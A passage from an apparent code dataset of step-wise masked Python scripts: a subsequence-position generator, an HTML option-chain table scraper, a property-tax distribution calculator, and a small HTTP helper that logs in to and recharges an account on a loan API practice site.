"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_all_lefts(word, substring):
if len(substring) == 0:
yield (len(word), word),
elif substring[0] not in word:
yield -1,
else:
for i in range(len(word)):
if word[i] == substring[0]:
for sub_sequance in get_all_lefts(word[i + 1:], substring[1:]):
yield (i, word[:i]), *sub_sequance
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_all_lefts(word, substring):
if len(substring) == 0:
yield (len(word), word),
elif substring[0] not in word:
yield -1,
else:
for i in range(len(word)):
if word[i] == substring[0]:
for sub_sequance in get_all_lefts(word[i + 1:], substring[1:]):
yield (i, word[:i]), *sub_sequance
if __name__ == '__main__':
word = input('')
substring = input('')
maxNum = 0
for lefts in map(list, get_all_lefts(word, substring)):
if -1 in lefts:
continue
print(lefts)
print(maxNum)
<|reserved_special_token_1|>
def get_all_lefts(word,substring):
if len(substring) == 0:
yield ((len(word),word),)
else:
if substring[0] not in word:
yield (-1,)
else:
for i in range(len(word)):
if word[i] == substring[0]:
for sub_sequance in get_all_lefts(word[i+1:],substring[1:]):
yield ((i,word[:i]),*sub_sequance)
if __name__ == '__main__':
word = input('')
substring = input('')
maxNum = 0
for lefts in map(list,get_all_lefts(word,substring)):
if -1 in lefts:
continue
print(lefts)
print(maxNum)
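A quick driver (the inputs are hypothetical, not from the original) makes the yielded structure concrete: each pair is (offset of the matched character, skipped prefix) and the last pair carries the leftover tail. The expected tuples were traced by hand from the recursion above:

for lefts in get_all_lefts('abcab', 'ab'):
    print(lefts)
# ((0, ''), (0, ''), (3, 'cab'))
# ((0, ''), (3, 'bca'), (0, ''))
# ((3, 'abc'), (0, ''), (0, ''))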
|
flexible
|
{
"blob_id": "8c0377b70b902e6e61351869a4378b4c2c50a3a7",
"index": 2478,
"step-1": "<mask token>\n",
"step-2": "def get_all_lefts(word, substring):\n if len(substring) == 0:\n yield (len(word), word),\n elif substring[0] not in word:\n yield -1,\n else:\n for i in range(len(word)):\n if word[i] == substring[0]:\n for sub_sequance in get_all_lefts(word[i + 1:], substring[1:]):\n yield (i, word[:i]), *sub_sequance\n\n\n<mask token>\n",
"step-3": "def get_all_lefts(word, substring):\n if len(substring) == 0:\n yield (len(word), word),\n elif substring[0] not in word:\n yield -1,\n else:\n for i in range(len(word)):\n if word[i] == substring[0]:\n for sub_sequance in get_all_lefts(word[i + 1:], substring[1:]):\n yield (i, word[:i]), *sub_sequance\n\n\nif __name__ == '__main__':\n word = input('')\n substring = input('')\n maxNum = 0\n for lefts in map(list, get_all_lefts(word, substring)):\n if -1 in lefts:\n continue\n print(lefts)\n print(maxNum)\n",
"step-4": "def get_all_lefts(word,substring):\n if len(substring) == 0:\n yield ((len(word),word),)\n else:\n if substring[0] not in word:\n yield (-1,)\n else:\n for i in range(len(word)):\n if word[i] == substring[0]:\n for sub_sequance in get_all_lefts(word[i+1:],substring[1:]):\n yield ((i,word[:i]),*sub_sequance)\n\nif __name__ == '__main__':\n word = input('')\n substring = input('')\n maxNum = 0\n for lefts in map(list,get_all_lefts(word,substring)):\n if -1 in lefts:\n continue\n print(lefts)\n print(maxNum)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if os.path.exists(Result_File):
os.remove(Result_File)
<|reserved_special_token_0|>
with open(Result_File, 'w') as r:
r.write(
'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'
)
for rows in main_table.find_all('tr'):
for cell in rows.find_all('td'):
if len(cell.text) != 0:
cell_text = cell.text.strip()
a = re.sub('\\n', '', cell_text, 0)
r.write(a)
r.write('|')
r.write('\n')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
Result_File = 'report.txt'
if os.path.exists(Result_File):
os.remove(Result_File)
f = codecs.open('test.html', 'r', 'utf-8')
xhtml = f.read()
data = []
soup = BeautifulSoup(xhtml, 'html.parser')
main_table = soup.find('table', {'id': 'octable'})
with open(Result_File, 'w') as r:
r.write(
'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'
)
for rows in main_table.find_all('tr'):
for cell in rows.find_all('td'):
if len(cell.text) != 0:
cell_text = cell.text.strip()
a = re.sub('\\n', '', cell_text, 0)
r.write(a)
r.write('|')
r.write('\n')
<|reserved_special_token_1|>
import requests
import codecs
import urllib.request
import time
from bs4 import BeautifulSoup
from html.parser import HTMLParser
import re
import os
Result_File = 'report.txt'
if os.path.exists(Result_File):
os.remove(Result_File)
f = codecs.open('test.html', 'r', 'utf-8')
xhtml = f.read()
data = []
soup = BeautifulSoup(xhtml, 'html.parser')
main_table = soup.find('table', {'id': 'octable'})
with open(Result_File, 'w') as r:
r.write(
'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'
)
for rows in main_table.find_all('tr'):
for cell in rows.find_all('td'):
if len(cell.text) != 0:
cell_text = cell.text.strip()
a = re.sub('\\n', '', cell_text, 0)
r.write(a)
r.write('|')
r.write('\n')
<|reserved_special_token_1|>
import requests
import codecs
import urllib.request
import time
from bs4 import BeautifulSoup
from html.parser import HTMLParser
import re
import os
#input
Result_File="report.txt"
#deleting result file if exists
if os.path.exists(Result_File):
os.remove(Result_File)
#reading html file and parsing logic
f=codecs.open("test.html", 'r', 'utf-8')
xhtml = f.read()
data = []
# instantiate the parser and feed data to it
soup = BeautifulSoup(xhtml,"html.parser")
#print(soup)
main_table = soup.find('table', { 'id': 'octable' })
#print(main_table)
with open(Result_File, 'w') as r:
r.write("OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE")
for rows in main_table.find_all('tr'):
for cell in rows.find_all('td'):
#print(data)
if(len(cell.text) != 0):
cell_text = cell.text.strip()
a = re.sub(r"\n", "", cell_text, 0)
r.write(a)
r.write("|")
r.write("\n")
|
flexible
|
{
"blob_id": "869bbc8da8cdb5de0bcaf5664b5482814daae53a",
"index": 6212,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif os.path.exists(Result_File):\n os.remove(Result_File)\n<mask token>\nwith open(Result_File, 'w') as r:\n r.write(\n 'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'\n )\n for rows in main_table.find_all('tr'):\n for cell in rows.find_all('td'):\n if len(cell.text) != 0:\n cell_text = cell.text.strip()\n a = re.sub('\\\\n', '', cell_text, 0)\n r.write(a)\n r.write('|')\n r.write('\\n')\n",
"step-3": "<mask token>\nResult_File = 'report.txt'\nif os.path.exists(Result_File):\n os.remove(Result_File)\nf = codecs.open('test.html', 'r', 'utf-8')\nxhtml = f.read()\ndata = []\nsoup = BeautifulSoup(xhtml, 'html.parser')\nmain_table = soup.find('table', {'id': 'octable'})\nwith open(Result_File, 'w') as r:\n r.write(\n 'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'\n )\n for rows in main_table.find_all('tr'):\n for cell in rows.find_all('td'):\n if len(cell.text) != 0:\n cell_text = cell.text.strip()\n a = re.sub('\\\\n', '', cell_text, 0)\n r.write(a)\n r.write('|')\n r.write('\\n')\n",
"step-4": "import requests\nimport codecs\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nfrom html.parser import HTMLParser\nimport re\nimport os\nResult_File = 'report.txt'\nif os.path.exists(Result_File):\n os.remove(Result_File)\nf = codecs.open('test.html', 'r', 'utf-8')\nxhtml = f.read()\ndata = []\nsoup = BeautifulSoup(xhtml, 'html.parser')\nmain_table = soup.find('table', {'id': 'octable'})\nwith open(Result_File, 'w') as r:\n r.write(\n 'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'\n )\n for rows in main_table.find_all('tr'):\n for cell in rows.find_all('td'):\n if len(cell.text) != 0:\n cell_text = cell.text.strip()\n a = re.sub('\\\\n', '', cell_text, 0)\n r.write(a)\n r.write('|')\n r.write('\\n')\n",
"step-5": "import requests\nimport codecs\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nfrom html.parser import HTMLParser\nimport re\nimport os\n\n#input\nResult_File=\"report.txt\"\n\n#deleting result file if exists\nif os.path.exists(Result_File):\n os.remove(Result_File)\n\n#reading html file and parsing logic\nf=codecs.open(\"test.html\", 'r', 'utf-8')\nxhtml = f.read()\ndata = []\n# instantiate the parser and feed data to it\nsoup = BeautifulSoup(xhtml,\"html.parser\")\n#print(soup)\nmain_table = soup.find('table', { 'id': 'octable' })\n#print(main_table)\nwith open(Result_File, 'w') as r:\n r.write(\"OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE\")\n for rows in main_table.find_all('tr'):\n for cell in rows.find_all('td'):\n\n#print(data)\n if(len(cell.text) != 0):\n cell_text = cell.text.strip()\n a = re.sub(r\"\\n\", \"\", cell_text, 0)\n\n r.write(a)\n r.write(\"|\")\n r.write(\"\\n\")\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_incremental_factors():
import csv
inc_file = open(incremental_factors_file, 'r')
reader = csv.reader(inc_file)
increment_map = dict()
funding_code_map = dict()
this_trn_code = ''
for row in reader:
if row[0] != '':
this_trn_code = row[0].replace('-', '')
this_trn = increment_map.get(this_trn_code, {})
this_trn[int(row[1])] = float(row[3])
funding_code_map[int(row[1])] = row[2]
increment_map[this_trn_code] = this_trn
return increment_map, funding_code_map
<|reserved_special_token_0|>
apns.sort()
<|reserved_special_token_0|>
for apn in apns:
try:
tax_history_index = tax_history_apns.index(apn)
except:
tax_history_index = None
if tax_history_index is None:
print('No Matching APN: ' + apn)
else:
this_tax_history = tax_history[tax_history_index]
total_tax = this_tax_history[3]
tra = this_tax_history[1]
this_tra = increment_map.get(tra, None)
if this_tra is None:
print('TRA is Null for APN: ' + apn)
else:
fraction = this_tra.get(cabrillo_key, None)
if fraction is None:
print('APN: ' + apn + ' is not in district')
else:
tax_distribution += [[this_tax_history[0], this_tax_history
[1], this_tax_history[2], fraction, this_tax_history[3],
[(t * fraction) for t in this_tax_history[3]]]]
<|reserved_special_token_0|>
print('District Contributions: ')
<|reserved_special_token_0|>
for ds in district_sum:
print(str(year) + ': ' + str(ds))
year += 1
p.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,
'wb'))
<|reserved_special_token_1|>
incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'
tax_pickle_for_apns = 'kmes_taxes.p'
tax_history_pickle = '../cusd_1percent_tax_history.p'
distribution_pickle_out = 'kmes_distribution.p'
cabrillo_key = 50200
def read_incremental_factors():
import csv
inc_file = open(incremental_factors_file, 'r')
reader = csv.reader(inc_file)
increment_map = dict()
funding_code_map = dict()
this_trn_code = ''
for row in reader:
if row[0] != '':
this_trn_code = row[0].replace('-', '')
this_trn = increment_map.get(this_trn_code, {})
this_trn[int(row[1])] = float(row[3])
funding_code_map[int(row[1])] = row[2]
increment_map[this_trn_code] = this_trn
return increment_map, funding_code_map
increment_map, funding_code_map = read_incremental_factors()
<|reserved_special_token_0|>
tax_data_apns = p.load(open(tax_pickle_for_apns, 'rb'))
apns = list(set([d[0] for d in tax_data_apns]))
apns.sort()
tax_distribution = list()
tax_history = p.load(open(tax_history_pickle, 'rb'))
tax_history_apns = [d[0] for d in tax_history]
for apn in apns:
try:
tax_history_index = tax_history_apns.index(apn)
except:
tax_history_index = None
if tax_history_index is None:
print('No Matching APN: ' + apn)
else:
this_tax_history = tax_history[tax_history_index]
total_tax = this_tax_history[3]
tra = this_tax_history[1]
this_tra = increment_map.get(tra, None)
if this_tra is None:
print('TRA is Null for APN: ' + apn)
else:
fraction = this_tra.get(cabrillo_key, None)
if fraction is None:
print('APN: ' + apn + ' is not in district')
else:
tax_distribution += [[this_tax_history[0], this_tax_history
[1], this_tax_history[2], fraction, this_tax_history[3],
[(t * fraction) for t in this_tax_history[3]]]]
<|reserved_special_token_0|>
district_data = np.array(np.array([x[5] for x in tax_distribution]))
print('District Contributions: ')
district_sum = np.sum(district_data, axis=0)
year = 2007
for ds in district_sum:
print(str(year) + ': ' + str(ds))
year += 1
p.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,
'wb'))
<|reserved_special_token_1|>
incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'
tax_pickle_for_apns = 'kmes_taxes.p'
tax_history_pickle = '../cusd_1percent_tax_history.p'
distribution_pickle_out = 'kmes_distribution.p'
cabrillo_key = 50200
def read_incremental_factors():
import csv
inc_file = open(incremental_factors_file, 'r')
reader = csv.reader(inc_file)
increment_map = dict()
funding_code_map = dict()
this_trn_code = ''
for row in reader:
if row[0] != '':
this_trn_code = row[0].replace('-', '')
this_trn = increment_map.get(this_trn_code, {})
this_trn[int(row[1])] = float(row[3])
funding_code_map[int(row[1])] = row[2]
increment_map[this_trn_code] = this_trn
return increment_map, funding_code_map
increment_map, funding_code_map = read_incremental_factors()
import pickle as p
tax_data_apns = p.load(open(tax_pickle_for_apns, 'rb'))
apns = list(set([d[0] for d in tax_data_apns]))
apns.sort()
tax_distribution = list()
tax_history = p.load(open(tax_history_pickle, 'rb'))
tax_history_apns = [d[0] for d in tax_history]
for apn in apns:
try:
tax_history_index = tax_history_apns.index(apn)
except:
tax_history_index = None
if tax_history_index is None:
print('No Matching APN: ' + apn)
else:
this_tax_history = tax_history[tax_history_index]
total_tax = this_tax_history[3]
tra = this_tax_history[1]
this_tra = increment_map.get(tra, None)
if this_tra is None:
print('TRA is Null for APN: ' + apn)
else:
fraction = this_tra.get(cabrillo_key, None)
if fraction is None:
print('APN: ' + apn + ' is not in district')
else:
tax_distribution += [[this_tax_history[0], this_tax_history
[1], this_tax_history[2], fraction, this_tax_history[3],
[(t * fraction) for t in this_tax_history[3]]]]
import numpy as np
district_data = np.array(np.array([x[5] for x in tax_distribution]))
print('District Contributions: ')
district_sum = np.sum(district_data, axis=0)
year = 2007
for ds in district_sum:
print(str(year) + ': ' + str(ds))
year += 1
p.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,
'wb'))
<|reserved_special_token_1|>
incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'
tax_pickle_for_apns = 'kmes_taxes.p'
tax_history_pickle = '../cusd_1percent_tax_history.p'
distribution_pickle_out = 'kmes_distribution.p'
cabrillo_key = 50200
def read_incremental_factors():
import csv
inc_file = open(incremental_factors_file, 'r')
reader = csv.reader(inc_file)
increment_map = dict()
funding_code_map = dict()
this_trn_code = ''
for row in reader:
if row[0] != '':
this_trn_code = row[0].replace('-','')
this_trn = increment_map.get(this_trn_code,{})
this_trn[int(row[1])] = float(row[3])
funding_code_map[int(row[1])] = row[2]
increment_map[this_trn_code] = this_trn
return increment_map, funding_code_map
increment_map, funding_code_map = read_incremental_factors()
import pickle as p
tax_data_apns = p.load(open(tax_pickle_for_apns,'rb'))
apns = list(set([d[0] for d in tax_data_apns]))
apns.sort()
tax_distribution = list()
tax_history = p.load(open(tax_history_pickle,'rb'))
tax_history_apns = [d[0] for d in tax_history]
for apn in apns:
try:
tax_history_index = tax_history_apns.index(apn)
except:
tax_history_index = None
if tax_history_index is None:
print('No Matching APN: ' + apn)
else:
this_tax_history = tax_history[tax_history_index]
total_tax = this_tax_history[3]
tra = this_tax_history[1]
this_tra = increment_map.get(tra, None)
if this_tra is None:
print('TRA is Null for APN: ' + apn)
else:
fraction = this_tra.get(cabrillo_key, None)
if fraction is None:
print('APN: ' + apn + ' is not in district')
else:
tax_distribution += [[this_tax_history[0], this_tax_history[1], this_tax_history[2], fraction, this_tax_history[3], [t*fraction for t in this_tax_history[3]]]]
import numpy as np
district_data = np.array(np.array([x[5] for x in tax_distribution]))
print('District Contributions: ')
district_sum = np.sum(district_data, axis=0)
year = 2007
for ds in district_sum:
print(str(year) + ": " + str(ds))
year += 1
p.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,'wb'))
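The nested mapping built by read_incremental_factors is easiest to see on a couple of rows. The values below are invented, but the resulting shape (TRA code to {fund id: fraction}, plus a flat fund-id-to-name map) follows directly from the loop above:

# hypothetical CSV rows: (TRA, fund id, fund name, fraction);
# a blank TRA column reuses the previous TRA code
rows = [['065-001', '50200', 'CABRILLO UNIFIED', '0.25'],
        ['', '10001', 'COUNTY GENERAL', '0.10']]
increment_map, funding_code_map, this_trn_code = {}, {}, ''
for row in rows:
    if row[0] != '':
        this_trn_code = row[0].replace('-', '')
    this_trn = increment_map.get(this_trn_code, {})
    this_trn[int(row[1])] = float(row[3])
    funding_code_map[int(row[1])] = row[2]
    increment_map[this_trn_code] = this_trn
print(increment_map)     # {'065001': {50200: 0.25, 10001: 0.1}}
print(funding_code_map)  # {50200: 'CABRILLO UNIFIED', 10001: 'COUNTY GENERAL'}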
|
flexible
|
{
"blob_id": "18dae039f6455f944cbaa97bcb9c36ed29ac9a21",
"index": 867,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_incremental_factors():\n import csv\n inc_file = open(incremental_factors_file, 'r')\n reader = csv.reader(inc_file)\n increment_map = dict()\n funding_code_map = dict()\n this_trn_code = ''\n for row in reader:\n if row[0] != '':\n this_trn_code = row[0].replace('-', '')\n this_trn = increment_map.get(this_trn_code, {})\n this_trn[int(row[1])] = float(row[3])\n funding_code_map[int(row[1])] = row[2]\n increment_map[this_trn_code] = this_trn\n return increment_map, funding_code_map\n\n\n<mask token>\napns.sort()\n<mask token>\nfor apn in apns:\n try:\n tax_history_index = tax_history_apns.index(apn)\n except:\n tax_history_index = None\n if tax_history_index is None:\n print('No Matching APN: ' + apn)\n else:\n this_tax_history = tax_history[tax_history_index]\n total_tax = this_tax_history[3]\n tra = this_tax_history[1]\n this_tra = increment_map.get(tra, None)\n if this_tra is None:\n print('TRA is Null for APN: ' + apn)\n else:\n fraction = this_tra.get(cabrillo_key, None)\n if fraction is None:\n print('APN: ' + apn + ' is not in district')\n else:\n tax_distribution += [[this_tax_history[0], this_tax_history\n [1], this_tax_history[2], fraction, this_tax_history[3],\n [(t * fraction) for t in this_tax_history[3]]]]\n<mask token>\nprint('District Contributions: ')\n<mask token>\nfor ds in district_sum:\n print(str(year) + ': ' + str(ds))\n year += 1\np.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,\n 'wb'))\n",
"step-3": "incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'\ntax_pickle_for_apns = 'kmes_taxes.p'\ntax_history_pickle = '../cusd_1percent_tax_history.p'\ndistribution_pickle_out = 'kmes_distribution.p'\ncabrillo_key = 50200\n\n\ndef read_incremental_factors():\n import csv\n inc_file = open(incremental_factors_file, 'r')\n reader = csv.reader(inc_file)\n increment_map = dict()\n funding_code_map = dict()\n this_trn_code = ''\n for row in reader:\n if row[0] != '':\n this_trn_code = row[0].replace('-', '')\n this_trn = increment_map.get(this_trn_code, {})\n this_trn[int(row[1])] = float(row[3])\n funding_code_map[int(row[1])] = row[2]\n increment_map[this_trn_code] = this_trn\n return increment_map, funding_code_map\n\n\nincrement_map, funding_code_map = read_incremental_factors()\n<mask token>\ntax_data_apns = p.load(open(tax_pickle_for_apns, 'rb'))\napns = list(set([d[0] for d in tax_data_apns]))\napns.sort()\ntax_distribution = list()\ntax_history = p.load(open(tax_history_pickle, 'rb'))\ntax_history_apns = [d[0] for d in tax_history]\nfor apn in apns:\n try:\n tax_history_index = tax_history_apns.index(apn)\n except:\n tax_history_index = None\n if tax_history_index is None:\n print('No Matching APN: ' + apn)\n else:\n this_tax_history = tax_history[tax_history_index]\n total_tax = this_tax_history[3]\n tra = this_tax_history[1]\n this_tra = increment_map.get(tra, None)\n if this_tra is None:\n print('TRA is Null for APN: ' + apn)\n else:\n fraction = this_tra.get(cabrillo_key, None)\n if fraction is None:\n print('APN: ' + apn + ' is not in district')\n else:\n tax_distribution += [[this_tax_history[0], this_tax_history\n [1], this_tax_history[2], fraction, this_tax_history[3],\n [(t * fraction) for t in this_tax_history[3]]]]\n<mask token>\ndistrict_data = np.array(np.array([x[5] for x in tax_distribution]))\nprint('District Contributions: ')\ndistrict_sum = np.sum(district_data, axis=0)\nyear = 2007\nfor ds in district_sum:\n print(str(year) + ': ' + str(ds))\n year += 1\np.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,\n 'wb'))\n",
"step-4": "incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'\ntax_pickle_for_apns = 'kmes_taxes.p'\ntax_history_pickle = '../cusd_1percent_tax_history.p'\ndistribution_pickle_out = 'kmes_distribution.p'\ncabrillo_key = 50200\n\n\ndef read_incremental_factors():\n import csv\n inc_file = open(incremental_factors_file, 'r')\n reader = csv.reader(inc_file)\n increment_map = dict()\n funding_code_map = dict()\n this_trn_code = ''\n for row in reader:\n if row[0] != '':\n this_trn_code = row[0].replace('-', '')\n this_trn = increment_map.get(this_trn_code, {})\n this_trn[int(row[1])] = float(row[3])\n funding_code_map[int(row[1])] = row[2]\n increment_map[this_trn_code] = this_trn\n return increment_map, funding_code_map\n\n\nincrement_map, funding_code_map = read_incremental_factors()\nimport pickle as p\ntax_data_apns = p.load(open(tax_pickle_for_apns, 'rb'))\napns = list(set([d[0] for d in tax_data_apns]))\napns.sort()\ntax_distribution = list()\ntax_history = p.load(open(tax_history_pickle, 'rb'))\ntax_history_apns = [d[0] for d in tax_history]\nfor apn in apns:\n try:\n tax_history_index = tax_history_apns.index(apn)\n except:\n tax_history_index = None\n if tax_history_index is None:\n print('No Matching APN: ' + apn)\n else:\n this_tax_history = tax_history[tax_history_index]\n total_tax = this_tax_history[3]\n tra = this_tax_history[1]\n this_tra = increment_map.get(tra, None)\n if this_tra is None:\n print('TRA is Null for APN: ' + apn)\n else:\n fraction = this_tra.get(cabrillo_key, None)\n if fraction is None:\n print('APN: ' + apn + ' is not in district')\n else:\n tax_distribution += [[this_tax_history[0], this_tax_history\n [1], this_tax_history[2], fraction, this_tax_history[3],\n [(t * fraction) for t in this_tax_history[3]]]]\nimport numpy as np\ndistrict_data = np.array(np.array([x[5] for x in tax_distribution]))\nprint('District Contributions: ')\ndistrict_sum = np.sum(district_data, axis=0)\nyear = 2007\nfor ds in district_sum:\n print(str(year) + ': ' + str(ds))\n year += 1\np.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,\n 'wb'))\n",
"step-5": "incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'\ntax_pickle_for_apns = 'kmes_taxes.p'\ntax_history_pickle = '../cusd_1percent_tax_history.p'\ndistribution_pickle_out = 'kmes_distribution.p'\ncabrillo_key = 50200\n\ndef read_incremental_factors():\n import csv\n inc_file = open(incremental_factors_file, 'r')\n reader = csv.reader(inc_file)\n increment_map = dict()\n funding_code_map = dict()\n this_trn_code = ''\n for row in reader:\n if row[0] != '':\n this_trn_code = row[0].replace('-','')\n this_trn = increment_map.get(this_trn_code,{})\n this_trn[int(row[1])] = float(row[3])\n funding_code_map[int(row[1])] = row[2]\n increment_map[this_trn_code] = this_trn\n return increment_map, funding_code_map\n\nincrement_map, funding_code_map = read_incremental_factors()\nimport pickle as p\ntax_data_apns = p.load(open(tax_pickle_for_apns,'rb'))\napns = list(set([d[0] for d in tax_data_apns]))\napns.sort()\ntax_distribution = list()\ntax_history = p.load(open(tax_history_pickle,'rb'))\ntax_history_apns = [d[0] for d in tax_history]\n\nfor apn in apns:\n try:\n tax_history_index = tax_history_apns.index(apn)\n except:\n tax_history_index = None\n if tax_history_index is None:\n print('No Matching APN: ' + apn)\n else:\n this_tax_history = tax_history[tax_history_index]\n total_tax = this_tax_history[3]\n tra = this_tax_history[1]\n this_tra = increment_map.get(tra, None)\n if this_tra is None:\n print('TRA is Null for APN: ' + apn)\n else:\n fraction = this_tra.get(cabrillo_key, None)\n if fraction is None:\n print('APN: ' + apn + ' is not in district')\n else:\n tax_distribution += [[this_tax_history[0], this_tax_history[1], this_tax_history[2], fraction, this_tax_history[3], [t*fraction for t in this_tax_history[3]]]]\n\nimport numpy as np\n\ndistrict_data = np.array(np.array([x[5] for x in tax_distribution]))\n\nprint('District Contributions: ')\n\ndistrict_sum = np.sum(district_data, axis=0)\nyear = 2007\nfor ds in district_sum:\n print(str(year) + \": \" + str(ds))\n year += 1\n\np.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,'wb'))\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def http_request(url, data, token=None, method='post'):
header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}
if method == 'get':
result = requests.get(url, json=data, headers=header)
else:
result = requests.post(url, json=data, headers=header)
return result.json()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def http_request(url, data, token=None, method='post'):
header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}
if method == 'get':
result = requests.get(url, json=data, headers=header)
else:
result = requests.post(url, json=data, headers=header)
return result.json()
if __name__ == '__main__':
login_url = 'http://120.78.128.25:8766/futureloan/member/login'
login_data = {'mobile_phone': 13665929730, 'pwd': '12345678'}
response = http_request(login_url, login_data)
    print('Login result: {}'.format(response))
token = response['data']['token_info']['token']
rec_url = 'http://120.78.128.25:8766/futureloan/member/recharge'
rec_data = {'member_id': 200170, 'amount': 123456}
print(http_request(rec_url, rec_data, 'bearer ' + token))
<|reserved_special_token_1|>
import requests
def http_request(url, data, token=None, method='post'):
header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}
if method == 'get':
result = requests.get(url, json=data, headers=header)
else:
result = requests.post(url, json=data, headers=header)
return result.json()
if __name__ == '__main__':
login_url = 'http://120.78.128.25:8766/futureloan/member/login'
login_data = {'mobile_phone': 13665929730, 'pwd': '12345678'}
response = http_request(login_url, login_data)
    print('Login result: {}'.format(response))
token = response['data']['token_info']['token']
rec_url = 'http://120.78.128.25:8766/futureloan/member/recharge'
rec_data = {'member_id': 200170, 'amount': 123456}
print(http_request(rec_url, rec_data, 'bearer ' + token))
<|reserved_special_token_1|>
# -*- coding: UTF-8 -*-
# @Time : 2020/06/24 20:01
# @Author: Liangping_Chen
# @E-mail: chenliangping_2018@foxmail.com
import requests
def http_request(url,data,token=None,method='post'):
header = {'X-Lemonban-Media-Type': 'lemonban.v2',
'Authorization':token}
    # decide whether this is a GET or a POST request
if method=='get':
        # send the register/login request
result = requests.get(url, json=data, headers=header)
else:
result = requests.post(url, json=data, headers=header)
    return result.json()  # return the parsed JSON body
if __name__ == '__main__':
login_url='http://120.78.128.25:8766/futureloan/member/login'
login_data={'mobile_phone':13665929730,'pwd':'12345678'}
response=http_request(login_url,login_data)
    print('Login result: {}'.format(response))
    # recharge
token=response['data']['token_info']['token']
rec_url='http://120.78.128.25:8766/futureloan/member/recharge'
rec_data = {'member_id': 200170, 'amount': 123456}
print(http_request(rec_url,rec_data,"bearer "+token))
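One caveat on the GET branch above: requests.get(..., json=data) sends the payload as a request body, which many servers ignore or reject on GET. A small sketch against a public echo service, used purely for illustration:

# httpbin echoes the request back, so we can confirm the call shape;
# this endpoint is not part of the original project
resp = http_request('https://httpbin.org/get', {'probe': 1}, method='get')
print(resp['url'])  # expected: https://httpbin.org/get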
|
flexible
|
{
"blob_id": "dd7c7fa6493a43988e1c8079797f6ff9b4d239dd",
